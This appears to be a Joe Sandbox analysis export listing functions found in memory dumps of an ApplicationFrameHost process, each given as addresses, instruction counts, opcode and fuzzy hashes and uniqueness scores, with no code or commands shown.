Function 00007FF848F439D3 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 295bbceb9dbc811bb6f711100146fe57650bb4b9fec12643f98263cbd9a58d8c
Instruction ID: 2566bc866767bdc1b1285d6ec2c77d4311d3a6fc37c71a1f3ed3ef50c5cc6553
Opcode Fuzzy Hash: 295bbceb9dbc811bb6f711100146fe57650bb4b9fec12643f98263cbd9a58d8c
Instruction Fuzzy Hash: 8C214736E0D9868EE311BB6CAC1A2F97BA0FF62BA1F040077C148DA093DB6950488795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F332F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f231ee07c106007c0fb6027f715689f6c0331f6389bdd050c17701a81d16c40
Instruction ID: a48d431673a73c22790dbeae8c982a512861f7dff9bab818e846e13c315cb329
Opcode Fuzzy Hash: 0f231ee07c106007c0fb6027f715689f6c0331f6389bdd050c17701a81d16c40
Instruction Fuzzy Hash: 2321CE70D0891D8FEB94EB98D494AECBBF1FB98341F50416AD00AE7292CB386980DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F333CF Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dab19a684c2bad1651386ad8f61cbafca82953e27f98ab053109eff3e40391c
Instruction ID: 2ecb4784bc8d40270d83ca2e2a1a7dafde932a6b2248f8aef0855aa4a14e3190
Opcode Fuzzy Hash: 9dab19a684c2bad1651386ad8f61cbafca82953e27f98ab053109eff3e40391c
Instruction Fuzzy Hash: 7721593084D68A9FE743EB78C8586A9BFE4FF1A351F0904BBD049C70A2EB389455C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079fe5840702cd06c6580fd08629126d46ea0cbec6f96fac567fb1898053adb6
Instruction ID: a0af207d54cffcc0bf225933383bc79cca329f9443d68364e93014492ebbdc47
Opcode Fuzzy Hash: 079fe5840702cd06c6580fd08629126d46ea0cbec6f96fac567fb1898053adb6
Instruction Fuzzy Hash: FE113C2184E6C68EEB63B77858655617F944F03264F2D46FBF0D8CA0E3DB0D5899C316

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F43109 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a0d426e6dbd7c328ae658f38cb2093279757abe4ab619095e86f4c6967b75f
Instruction ID: a28a3f02454c1265870e2297b073f5c803819c6859fedb610449105a8aa9cacb
Opcode Fuzzy Hash: 61a0d426e6dbd7c328ae658f38cb2093279757abe4ab619095e86f4c6967b75f
Instruction Fuzzy Hash: 1A21B730C0D68A9FE742E7688859AAA7FF0FF6A350F0405FBD449C71A2DA285544C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F423E1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5170dae90a06ed8baadd1fba88be4b36a3a9c748f25b0bf1cda44b7cca4673
Instruction ID: 5f5b98ef41ba068066f0c811adbdca7bd6948f0e126057fbf8818be6ba395dc4
Opcode Fuzzy Hash: 3e5170dae90a06ed8baadd1fba88be4b36a3a9c748f25b0bf1cda44b7cca4673
Instruction Fuzzy Hash: 9011A9709086498FDB48EF18C4961E97BE0FF68740F0102BFE80AD32A2DB38A550CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44675 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df7968919ca4c9f39dfc649007992e6d01da2e7c5889b54b08d2cd8ab16d4e7
Instruction ID: ea6d4b6b6ceec33d4b52dbe33f4bb811d2b1129bc186f0da47184177aed4a32b
Opcode Fuzzy Hash: 7df7968919ca4c9f39dfc649007992e6d01da2e7c5889b54b08d2cd8ab16d4e7
Instruction Fuzzy Hash: 0C11603090E64E9FDB89EF6884592B9BBA1FF68345F1405BFD409E25D5DB346440C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F445D9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8d2566dcd2eb2b39ffd60d5141ebd3781a15031349528127aee15b21a65f4e
Instruction ID: 0a4611567c72818e76bb5e6c9de4d85343b6f825ed6aa80b8b6e55e41850814a
Opcode Fuzzy Hash: ff8d2566dcd2eb2b39ffd60d5141ebd3781a15031349528127aee15b21a65f4e
Instruction Fuzzy Hash: 1E21813080D6899FEB85EF28C4592BDBBA0FF69345F0405BBD419D71D2DB386440CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a790fc7ea2d9c23eec0ac9e976fcaabeb4bf0549ac72a262b469162315f9363
Instruction ID: c99c65caa88a8329561f9517d28bc3d7e2b57701f13e9f2c7d32719ebb1d6253
Opcode Fuzzy Hash: 6a790fc7ea2d9c23eec0ac9e976fcaabeb4bf0549ac72a262b469162315f9363
Instruction Fuzzy Hash: 4901C031E0C68E9EE752FB7888895A97BE0EF95340F2504B3D849C6092EA24A445C695

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F425EB Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24123ae4c23027a305a3b12dff01767b14ea76c290cf720fa38a6f2f7ca45354
Instruction ID: d5b52f56612522f9e39c2c482d777f7fd01718496a9abea431602f5ce11c5684
Opcode Fuzzy Hash: 24123ae4c23027a305a3b12dff01767b14ea76c290cf720fa38a6f2f7ca45354
Instruction Fuzzy Hash: 2F11DD3084D7894FDB5AAB6088292F97BA0FF26302F0500BBD80AC71E2EB386581C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44B15 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87115128630141b8c4e1fffae45f6ce84da13d0b01834e54f3d0e86afaf6209
Instruction ID: 57d2c4eebad5c27121aac636b27b08180753bdb584e474c4d5b4bdf1eb487e41
Opcode Fuzzy Hash: e87115128630141b8c4e1fffae45f6ce84da13d0b01834e54f3d0e86afaf6209
Instruction Fuzzy Hash: CC11C431C0EA898FE799EB6488692B87BA0FF75745F0400BFC00DE65D2DB296448C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BE4D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction ID: df4901377f8ebb8e4a808742a5cdb213fc60443cd7d9b404a858c888c3da128c
Opcode Fuzzy Hash: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction Fuzzy Hash: 5521A371D1960A8FDB58EF99D4A46EDBBB1BF18351F20003AE419A72D1CB386990CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47441 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f47000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3049f5b496980108656e60f4594d4ff7a6c3f23619d9c498c32c407d0ffa87
Instruction ID: 2ff19752bd6f616b9957fa01b72ff588e678eb0d029601cab2cb748572e10017
Opcode Fuzzy Hash: bd3049f5b496980108656e60f4594d4ff7a6c3f23619d9c498c32c407d0ffa87
Instruction Fuzzy Hash: 2E115A3090D94E9FEB51FBB888486B9BFE4FF29741F0404B7D408D70A2EB38A5908B55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6af828333259ce2d011f87e3ed9ba9c068e21e80b1cff0fa10f136df40c1ab5
Instruction ID: 6e9c075e55851a5e90af4ae9e35b93972f62bcf917e18cdb4d369d89f5eb8041
Opcode Fuzzy Hash: f6af828333259ce2d011f87e3ed9ba9c068e21e80b1cff0fa10f136df40c1ab5
Instruction Fuzzy Hash: 7D114F7190D58B8FEB99EB28E5196B977A0FF19345F0408BED00ED25D2DF3964018714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44F29 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60182809a5800315b1131fee6f476894588e2b556e3f084a2cfef8770b29cdae
Instruction ID: 7cd9670692ec297daef8323ac6ddc77467d9eabc5e0786898465ac5e1fcc7a32
Opcode Fuzzy Hash: 60182809a5800315b1131fee6f476894588e2b556e3f084a2cfef8770b29cdae
Instruction Fuzzy Hash: F7119D30C0E68A8FEB85EB2488692B97BF0FF29315F0404BBC409E71D2EB386444C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F427D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685efda2bb0e56ead0ba5a0c3a644059b59c85d056a18256031ba795251a2fbf
Instruction ID: 20bba640257309ef2baabb9b01affcec2ad7c1c89af45dee393bd04318682849
Opcode Fuzzy Hash: 685efda2bb0e56ead0ba5a0c3a644059b59c85d056a18256031ba795251a2fbf
Instruction Fuzzy Hash: B4115E3090D55A9EE742BBA888585F97BE0FF29341F1448B7D408D7096EB349144C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44C3D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e58a468e4f0998403f19f171568d107c1144dbc3d7b60bc1e3562ca68ed2f0d
Instruction ID: 7dcbda90e941f8a51c02c893da032d3606d2edd7f5ce9b5da49b1404d00f33f9
Opcode Fuzzy Hash: 3e58a468e4f0998403f19f171568d107c1144dbc3d7b60bc1e3562ca68ed2f0d
Instruction Fuzzy Hash: 6D11BF3080E68A9FEB88EB6484592BEBBF0FF28305F0804BBC409E71D2DB35A440C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F334F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266770d4157536f4d1bca3ca0b34f826be9bc17394ffca0440aaf4479e987e0e
Instruction ID: 2fc6d42856c4b33d4400f2530f7fda4419118314598fea78c3a4d478d7fe4276
Opcode Fuzzy Hash: 266770d4157536f4d1bca3ca0b34f826be9bc17394ffca0440aaf4479e987e0e
Instruction Fuzzy Hash: DB11577091868E8FEB99EF6898596BE7BA0FF18301F4409BFD41AC61D2EB35A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44E9D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1020f12b922b77a742cacc022a58bd54f521ebbb8608f7f1a63d11e9983aef
Instruction ID: 2c4bf7f4eeb1951a0d9d83a9810037902252fe9ec6bac6efa74db2d5a679cc71
Opcode Fuzzy Hash: fd1020f12b922b77a742cacc022a58bd54f521ebbb8608f7f1a63d11e9983aef
Instruction Fuzzy Hash: 71119E3090EA8A8FEB49EB2484696BD7BE0FF28355F0405BBD419E65D2DB39A580C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3C539 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b62bafa3103bcd57bd9b028c0bfbbf5e3979b55b3ef10f23de3fed823fc6a2
Instruction ID: d4220a2fc93e398ec33f96acd8af15133df2075077be5e150759736585610546
Opcode Fuzzy Hash: a2b62bafa3103bcd57bd9b028c0bfbbf5e3979b55b3ef10f23de3fed823fc6a2
Instruction Fuzzy Hash: F111CE3080D68D8FDB89EF2884592B97BA1FF69341F5401BBD40AC61D2EB35A460C754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506c031c2d4a518fc7ef65db785979f59baaf974452a1daced600b9d7436fdf2
Instruction ID: dd5321a281c3ac80361c67192daa6a3b05449f6c4381d525cb35bb42a1a75648
Opcode Fuzzy Hash: 506c031c2d4a518fc7ef65db785979f59baaf974452a1daced600b9d7436fdf2
Instruction Fuzzy Hash: E7113930919A8E8FEB85EF6888692BDBBE0FF18341F4004BBD41AC61D2DF75A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd50c2d7426bc6ad75b9c622209697333bdbde14105088c375e1161d87f4a601
Instruction ID: 46729d5223554c0bd981ae4357964a1022507cc6b933d757906cfc9921d209fc
Opcode Fuzzy Hash: fd50c2d7426bc6ad75b9c622209697333bdbde14105088c375e1161d87f4a601
Instruction Fuzzy Hash: 86017831D0D68E9FE751FB68884A6A97BE0EF59342F0508B7D80CC61E2EB38E4848704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6214793a28126d28474792507354dc5be763ff58161a94f70543dbf4505f41
Instruction ID: 1c9c6b660605f6752c29925f6b6ec4b2fa5218c9d4f79e300ff7cb9450e7d000
Opcode Fuzzy Hash: da6214793a28126d28474792507354dc5be763ff58161a94f70543dbf4505f41
Instruction Fuzzy Hash: D3014C3090950E8FEB49EF24C4596FAB7A1FF58385F50457AE40EC21D1DF35A5A1CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f41000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3abc1f942119097641419755e575ecd7a16518f1a5e08735d1449a3a2d7b0dbb
Instruction ID: 9345ce5d6cb0950bcdc16c78994d465c84e1af4e53c8276958fc9d6ce13a9233
Opcode Fuzzy Hash: 3abc1f942119097641419755e575ecd7a16518f1a5e08735d1449a3a2d7b0dbb
Instruction Fuzzy Hash: CE01D43085D6498FEB49EF74C4586BA7BA0FF29300F0104BBD41AD60D2DF35A654CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f47000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cf0d00814a69dd02777e52577909c3fc04684750ccae526c9c8370962202a5
Instruction ID: c3a27fc7fc4a38b55ba7ad11c45eb052bb0c51e7a2866f27a11d11561e5cfcaa
Opcode Fuzzy Hash: 74cf0d00814a69dd02777e52577909c3fc04684750ccae526c9c8370962202a5
Instruction Fuzzy Hash: 63015A3086DA8D8FDB49EB24C8696B97BA0EF29341F0504BFD40AD61D2DF6AA550C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4bdc665adfb13858fc24da7b76ede21a255a79eb1a45c08fe3d973b2fd04e0
Instruction ID: 1c4ccfaa58656c3748b478608dcde3c08716ff8e4a1c22d7bf0b30d9f64bd852
Opcode Fuzzy Hash: 2a4bdc665adfb13858fc24da7b76ede21a255a79eb1a45c08fe3d973b2fd04e0
Instruction Fuzzy Hash: 4C018B3085D64E9FE795FB6884886B97BE0FF59342F5504B7D408C70A2EB38E0408704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f47000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486277b8e3d0baa47188ebd847cd32994f064ec12c647dfa65cb68edcb8c1663
Instruction ID: d7a94b6b49fc31feee72775d46e43b5be3b61b986decd3e7d2e74dcc0bf96e77
Opcode Fuzzy Hash: 486277b8e3d0baa47188ebd847cd32994f064ec12c647dfa65cb68edcb8c1663
Instruction Fuzzy Hash: 65019E3091DA8D8FDB4AEB34C4692B97BA0FF29340F4404BBD40AD61D2DF26A450C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3CA08 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26555219f30c5be7e82de2779254d89f923b105ff5015f2487ab2517e92f60cc
Instruction ID: d3dc0f79336c19ee7d773d6bb100bb1fa39c8555ee7dd517c39e168521a02e9d
Opcode Fuzzy Hash: 26555219f30c5be7e82de2779254d89f923b105ff5015f2487ab2517e92f60cc
Instruction Fuzzy Hash: 22016D31C0D69E8EEF94FF6898191FA7AA0FF14691F04057BE818C2191EB745560C754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3AB15 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90556f8b016f8dd4cf23dd9667f08a8df8c4d25eb578822f10b120b0e80eece9
Instruction ID: dbabe12bacc3c89dd6d965755f76abe3c82923751c71e147040b32af2524ce8d
Opcode Fuzzy Hash: 90556f8b016f8dd4cf23dd9667f08a8df8c4d25eb578822f10b120b0e80eece9
Instruction Fuzzy Hash: 98F0283370E3924FC312AB2EBCA21EA3B34DF921A5B0942B3C084CA1D3DB1D900A4795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ed95bd33b3a36ef75d9447d5aacc5ef67bf19cc4d7a1ff397508423117af2b
Instruction ID: 0aab06960ecf77e6019811eed53df505c651e1856fc102b1245d61f21c80c88a
Opcode Fuzzy Hash: 59ed95bd33b3a36ef75d9447d5aacc5ef67bf19cc4d7a1ff397508423117af2b
Instruction Fuzzy Hash: 8E018F31D1D6898FE742BB7488592A97FE0EF5A342F0604F7D808CB0E6EB38A4448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f3a000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da11c46b978232479aa922c2e4d6e89e84417c4614950af28e4803409c2afc1
Instruction ID: df076596ad3f87428faec7ce7d98656682839d74adaa5d0da914003bdc208cc5
Opcode Fuzzy Hash: 9da11c46b978232479aa922c2e4d6e89e84417c4614950af28e4803409c2afc1
Instruction Fuzzy Hash: 2D018F3194DA899FEB52FB7489595A97BE0EF19380F0509F3D408CB0A2EB38A484C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F475C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f47000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6736d4a28462f6b17538229135ac64877ba144c46c5cf63c2b12cbd3857487b
Instruction ID: d1976f106052d25680f80dba711076704ba520fe59e16abf0c280e268da0d142
Opcode Fuzzy Hash: c6736d4a28462f6b17538229135ac64877ba144c46c5cf63c2b12cbd3857487b
Instruction Fuzzy Hash: E9017C7084EA8E5FE742FB3888591A97BE1EF29350F0548B3D408CB0E2EB28A4448701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c74c738ecf7367348dac52073ec58c16d11ad66e391527ecf2e82c959b178af
Instruction ID: 4794d25c5a6681d3fa2bbd6eff45ae0c374001bef69d1c13adc32b2584e060e3
Opcode Fuzzy Hash: 8c74c738ecf7367348dac52073ec58c16d11ad66e391527ecf2e82c959b178af
Instruction Fuzzy Hash: 7601693091860E9EEB59FBA884586BE76A1FF18346F50087EE40EC21D1DF35A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2183555482.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ab27f5642cbee8c6fb1c280af0755712d40a1ebba966ab6d07f02b40eb2091
Instruction ID: 6219f8e478f7288b5a6a387aeba465da587462ac9d0f57943ec33611ad17cc31
Opcode Fuzzy Hash: 29ab27f5642cbee8c6fb1c280af0755712d40a1ebba966ab6d07f02b40eb2091
Instruction Fuzzy Hash: 1C016930919A0E9FEB59EB6484592B9B7E0FF18346F20487FE40EC21D1DF39A550C614

Uniqueness

Uniqueness Score: -1.00%

